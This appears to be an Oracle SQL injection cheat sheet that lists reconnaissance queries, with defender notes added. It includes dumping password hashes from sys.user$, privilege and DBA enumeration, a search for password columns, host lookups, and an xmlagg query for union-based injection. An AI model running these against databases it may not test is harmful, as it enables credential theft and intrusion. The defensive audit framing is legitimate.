
Oracle

Some of the queries below can only be run by an admin (privileged) account. These are marked with (PRIV) in the section heading.

Version

-- Banner row for the database itself.
SELECT banner
  FROM v$version
 WHERE banner LIKE 'Oracle%';

-- Banner row for the TNS component.
SELECT banner
  FROM v$version
 WHERE banner LIKE 'TNS%';

-- Bare version string of the running instance.
SELECT version
  FROM v$instance;

Comments

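-- Everything after "--" up to the end of the line is ignored by the parser.
-- Older Oracle releases require a FROM clause, so the example reads from dual
-- like the other single-value queries on this page.
SELECT 1 FROM dual; -- comment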

Current User

-- USER is a built-in that returns the name of the session user.
SELECT user
  FROM dual;

List Users

-- Accounts visible to the current session, sorted by name.
SELECT username
  FROM all_users
 ORDER BY username;

-- Names read directly from the SYS-owned base table.
-- NOTE(review): sys.user$ normally needs privileged access and also holds
-- role names, so this is not a like-for-like replacement for all_users.
SELECT name
  FROM sys.user$;

List Password Hashes (PRIV)

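-- Oracle version <= 10g
-- astatus tells you if the account is locked
SELECT name, password, astatus FROM sys.user$;

-- Oracle version 11g
SELECT name, spare4 FROM sys.user$;

-- Defender note: sys.user$ is a SYS-owned base table. Audit reads of it and
-- alert on any session other than a known DBA or maintenance account touching it.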

List Privileges (PRIV)

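-- Privileges active in the current session.
-- The select list was missing, which is a syntax error; "*" restored.
SELECT * FROM session_privs;

-- Role memberships for every grantee.
SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;

-- List a user's privs
SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP';

-- Find users with a particular priv
SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY';

-- Defender note: the same queries serve as a least-privilege review. Grantees
-- holding broad "ANY" system privileges are the ones to justify or revoke.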

List DBA Accounts (PRIV)

-- Grantees that hold at least one system privilege WITH ADMIN OPTION.
-- This is a proxy for "DBA accounts": the grantee column can name roles as
-- well as users, and membership of the DBA role itself is not checked here.
SELECT DISTINCT grantee
  FROM dba_sys_privs
 WHERE ADMIN_OPTION = 'YES';

Current Database

-- Global database name.
SELECT global_name
  FROM global_name;

-- Database name as recorded in the control file view.
SELECT name
  FROM v$database;

-- Name of the instance serving this session.
SELECT instance_name
  FROM v$instance;

-- Same information through the SYS.DATABASE_NAME function.
SELECT SYS.DATABASE_NAME
  FROM DUAL;

List Databases

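-- List schemas (one per user).
-- Only schemas that own at least one table visible to the current session
-- are returned, because the list is derived from all_tables.
SELECT DISTINCT owner FROM all_tables;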

List Tables

-- Every table the current session is allowed to see.
SELECT table_name
  FROM all_tables;

-- Same list, qualified with the owning schema.
SELECT owner,
       table_name
  FROM all_tables;

List Columns

-- Columns of a table, matched by table name only.
-- 'blah' and 'foo' are placeholders; the dictionary stores unquoted
-- identifiers in upper case, so real values are normally upper case.
SELECT column_name
  FROM all_tab_columns
 WHERE table_name = 'blah';

-- Same lookup narrowed to one owning schema.
SELECT column_name
  FROM all_tab_columns
 WHERE table_name = 'blah'
   AND owner = 'foo';

Find Tables from Column Name

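-- NB: table and column names are stored in upper case in the dictionary,
-- so the LIKE pattern must be upper case too.
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';

-- Defender note: the same search is a quick way to inventory columns that
-- may hold credentials and confirm they are hashed or encrypted and access-controlled.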

Hostname, IP Address

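-- Host name of the database server.
SELECT UTL_INADDR.get_host_name FROM dual;
SELECT host_name FROM v$instance;

-- Gets IP address
SELECT UTL_INADDR.get_host_address FROM dual;

-- Gets hostnames (typographic quotes replaced with plain single quotes)
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;

-- Defender note: from 11g onward UTL_INADDR calls are subject to network ACLs.
-- Revoking EXECUTE on UTL_INADDR from PUBLIC where it is not needed removes
-- this lookup path for ordinary application accounts.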

Location of DB Files

-- File system paths of the datafiles that belong to this database.
SELECT name
  FROM V$DATAFILE;

Get all tablenames in One String

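-- When using union based SQLi with only one row:
-- xmlagg folds every table_name into one comma-separated value and rtrim
-- drops the trailing comma, so the whole list comes back as a single row.
SELECT rtrim(xmlagg(xmlelement(e, table_name || ',')).extract('//text()').extract('//text()') ,',') from all_tables;

-- Defender note: XML aggregation over dictionary views from an application
-- account is unusual and is a useful pattern to flag in database audit logs.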